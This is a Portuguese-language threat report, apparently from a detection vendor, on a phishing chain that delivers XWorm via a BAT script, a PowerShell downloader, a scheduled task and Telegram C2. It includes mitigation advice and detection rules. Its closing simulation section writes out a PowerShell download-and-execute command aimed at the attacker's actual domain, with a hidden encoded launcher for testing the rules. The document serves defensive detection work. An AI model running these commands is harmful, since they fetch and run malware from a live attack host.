Seguir
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Um email de phishing entrega um anexo malicioso contendo um script BAT que inicia o PowerShell para baixar uma carga útil codificada em Base64. Após a decodificação, a carga útil se transforma em XWorm, um stealer .NET que identifica o host e exfiltra dados coletados através de um bot do Telegram. A persistência é estabelecida criando uma tarefa agendada que executa repetidamente o executável baixado. A operação depende de vários elementos de infraestrutura, incluindo uma isca de hospedagem de imagens falsa e pelo menos um IP comprometido usado para planejar a carga útil.
Investigação
A revisão do script BAT revelou uma linha única de comando do PowerShell que recupera um arquivo parecido com PNG de um domínio controlado pelo atacante. O conteúdo Base64 embutido é então sanitizado, invertido e decodificado para reconstruir o executável .NET. A análise binária mostrou que o malware registra uma tarefa agendada chamada Chromiumx2 e usa a API do Telegram para comando e controle e exfiltração de dados. Os investigadores extraíram indicadores principais de rede, incluindo o domínio de hospedagem, endereço IP associado e o endpoint da API do Telegram referenciado durante a execução.
Mitigação
Prevenir a execução de conteúdo BAT e PowerShell não confiável originado de anexos de email ou diretórios de download dos usuários. Aplicar uma lista de permissões de aplicativos para restringir a criação de tarefas agendadas e sinalizar novos registros de tarefas suspeitos. Monitorar e, quando possível, restringir o acesso de saída para endpoints da API do Telegram e bloquear os domínios maliciosos identificados nas camadas de DNS/proxy. Manter as detecções de endpoint atualizadas com novos indicadores observados e padrões de download baseados em scripts.
Resposta
Isolar endpoints onde a tarefa agendada Chromiumx2 ou Chromiumx2.exe é observada. Remover a tarefa agendada, deletar o binário malicioso e coletar artefatos (script, carga útil decodificada, XML de tarefa e logs relevantes) para escopo forense. Caçar pelo ambiente o mesmo nome de tarefa, comportamento de decodificação PowerShell similar, e tráfego direcionado pelo Telegram. Redefinir credenciais potencialmente expostas e notificar os usuários sobre o anexo de phishing para reduzir execução repetida.
graph TB %% Definições de classe classDef technique fill:#99ccff classDef file fill:#ffcc99 classDef process fill:#ffeb99 classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef c2 fill:#c2f0c2 %% Nós initial_access[“<b>Técnica</b> – T1566.001 Anexo de Spearphishing<br/><b>Descrição</b>: O atacante envia um e-mail malicioso com um anexo .bat.”]:::technique attachment_file[“<b>Arquivo</b> – malicious_attachment.bat<br/><b>Propósito</b>: Solta uma imagem PNG que contém shellcode oculto.”]:::file masquerading[“<b>Técnica</b> – T1036.008 Mascaramento do tipo de arquivo<br/><b>Descrição</b>: O PNG chamado optimized_MSI.png na verdade contém shellcode delimitado por BaseStart- e -BaseEnd.”]:::technique png_image[“<b>Arquivo</b> – optimized_MSI.png<br/><b>Conteúdo</b>: Shellcode incorporado com delimitadores.”]:::file user_execution[“<b>Técnica</b> – T1204 Execução pelo usuário<br/><b>Descrição</b>: A vítima executa o arquivo batch malicioso.”]:::technique powershell_exec[“<b>Técnica</b> – T1059.001 PowerShell<br/><b>Descrição</b>: Decodifica dados Base64, reverte strings hexadecimais e executa o shellcode.”]:::technique obfuscation[“<b>Técnicas</b> – T1027.008, T1027.004, T1027.009, T1027.003, T1027.007<br/><b>Descrição</b>: O payload é poluído com dados inúteis, hex invertido, compilação em tempo de execução, esteganografia e resolução dinâmica de API.”]:::technique c2_communication[“<b>Técnicas</b> – T1059.009 API em nuvem, T1102.002 Serviço Web bidirecional, T1102.003 Comunicação unidirecional<br/><b>Descrição</b>: O backdoor .NET utiliza a API do Telegram Bot para comando e controle.”]:::c2 telegram_api[“<b>Ferramenta</b> – Telegram Bot API<br/><b>Endpoint</b>: api.telegram.org”]:::tool persistence[“<b>Técnicas</b> – T1543 Criar ou modificar processo do sistema, T1546.002 Execução acionada por evento, T1547.014 Active Setup<br/><b>Descrição</b>: A tarefa agendada \”Chromiumx2\” é executada a cada minuto; o protetor de tela e o Active Setup forçam a execução.”]:::technique scheduled_task[“<b>Processo</b> – schtasks<br/><b>Tarefa</b>: Chromiumx2”]:::process priv_esc[“<b>Técnicas</b> – T1055 Injeção de processo, T1574 Sequestro do fluxo de execução<br/><b>Descrição</b>: O shellcode é injetado em um processo legítimo para obter privilégios elevados.”]:::technique process_injection[“<b>Processo</b> – Processo legítimo<br/><b>Alvo</b>: Recebe o shellcode injetado.”]:::process credential_access[“<b>Técnicas</b> – T1555.003 Credenciais de navegadores web, T1539 Roubo de cookies de sessão web<br/><b>Descrição</b>: O injetor do Chrome coleta senhas, cookies e outros dados do navegador.”]:::technique chrome_injector[“<b>Malware</b> – Chrome Injector<br/><b>Função</b>: Extrai credenciais armazenadas e cookies de sessão.”]:::malware discovery[“<b>Técnica</b> – T1217 Descoberta de informações do navegador<br/><b>Descrição</b>: Enumera caminhos de perfis do Chrome e credenciais armazenadas.”]:::technique exfiltration[“<b>Técnica</b> – T1041 Exfiltração através do canal C2<br/><b>Descrição</b>: Credenciais coletadas e informações do sistema são exfiltradas via canal do Telegram.”]:::technique lateral_movement[“<b>Técnicas</b> – T1080 Contaminação de conteúdo compartilhado, T1210 Exploração de serviços remotos<br/><b>Descrição</b>: Payloads adicionais são baixados para possível propagação adicional.”]:::technique additional_payload[“<b>Arquivo</b> – buildingmoney.txt<br/><b>Propósito</b>: Contém código malicioso adicional para movimento lateral.”]:::file %% Conexões initial_access –>|entrega| attachment_file attachment_file –>|cria| masquerading masquerading –>|produz| png_image png_image –>|usado por| user_execution user_execution –>|aciona| powershell_exec powershell_exec –>|executa| obfuscation obfuscation –>|contata| c2_communication c2_communication –>|usa| telegram_api c2_communication –>|estabelece| persistence persistence –>|cria| scheduled_task scheduled_task –>|executa| priv_esc priv_esc –>|injeta em| process_injection process_injection –>|permite| credential_access credential_access –>|implementado por| chrome_injector chrome_injector –>|coleta| discovery discovery –>|alimenta| exfiltration exfiltration –>|envia dados via| c2_communication c2_communication –>|baixa| additional_payload additional_payload –>|habilita| lateral_movement
Fluxo de Ataque
Detecções
Possível Abuso do Telegram Como Canal de Comando e Controle (via dns_query)
Visualizar
Processo Suspeito Utiliza um URL na Linha de Comando (via cmdline)
Visualizar
Download ou Upload via Powershell (via cmdline)
Visualizar
Schtasks Aponta para Diretório / Binário / Script Suspeito (via cmdline)
Visualizar
Strings Suspeitas do Powershell (via powershell)
Visualizar
Arquivos Suspeitos no Perfil do Usuário Público (via file_event)
Visualizar
Strings Suspeitas do Powershell (via cmdline)
Visualizar
Possível Uso do Schtasks ou AT para Persistência (via cmdline)
Visualizar
IOCs (SourceIP) para detectar: Script Malicioso Entregando Mais Malicias
Visualizar
IOCs (DestinationIP) para detectar: Script Malicioso Entregando Mais Malicias
Visualizar
Criação de Tarefa Agendada para Persistência do Chromiumx2 [Criação de Processo do Windows]
Visualizar
Detectar Busca de Carga Útil do PowerShell Codificada em Base64 [Powershell do Windows]
Visualizar
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria & Base deve ter passado.
-
Narrativa do Ataque & Comandos:
O atacante quer baixar e executar uma carga útil maliciosa de um servidor web comprometido. Para evitar a detecção de assinatura clássica, eles embutem toda a lógica de download e execução em uma única string Base64 e invocam o PowerShell com-EncodedCommand. O comando referencia o URL exato que a regra de detecção monitora (https://uniworldrivercruises-co.uk/optimized_MSI.png).-
Codificar a carga útil maliciosa (um simples downloader que executa o script recebido):
$payload = "IEX (New-Object Net.WebClient).DownloadString('https://uniworldrivercruises-co.uk/optimized_MSI.png')" $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload)) Write-Host $b64B64 Resultante (exemplo):
SQBFAFgAIABpAG4AIABOAGUAdwAtAE8AbgB0AGkAYwBzACA...(truncado). -
Execute o comando codificado:
powershell -EncodedCommand SQBFAFgAIABpAG4AIABOAGUAdwAtAE8AbgB0AGkAYwBzACA...
Esta linha única gera a telemetria exata que a regra Sigma espera: um processo PowerShell, o
-EncodedCommandflag, e o URL malicioso dentro do bloco de script decodificado. -
-
Script de Teste de Regressão:
#------------------------------------------------- # Script de regressão para acionar a regra de detecção #------------------------------------------------- # 1. Construir a carga útil maliciosa $payload = "IEX (New-Object Net.WebClient).DownloadString('https://uniworldrivercruises-co.uk/optimized_MSI.png')" $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload)) # 2. Execute a carga útil via um comando PowerShell codificado Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $b64" ` -WindowStyle Hidden -PassThru | Out-Null Write-Host "Comando codificado e malicioso executado." #------------------------------------------------- -
Comandos de Limpeza:
# Remover quaisquer arquivos temporários (nenhum esperado, pois a carga útil é transmitida diretamente) # Terminar quaisquer processos PowerShell ocultos iniciados pelo teste Get-Process -Name "powershell" -ErrorAction SilentlyContinue | Where-Object {$_.StartInfo.Arguments -match "-EncodedCommand"} | Stop-Process -Force Write-Host "Limpeza completa."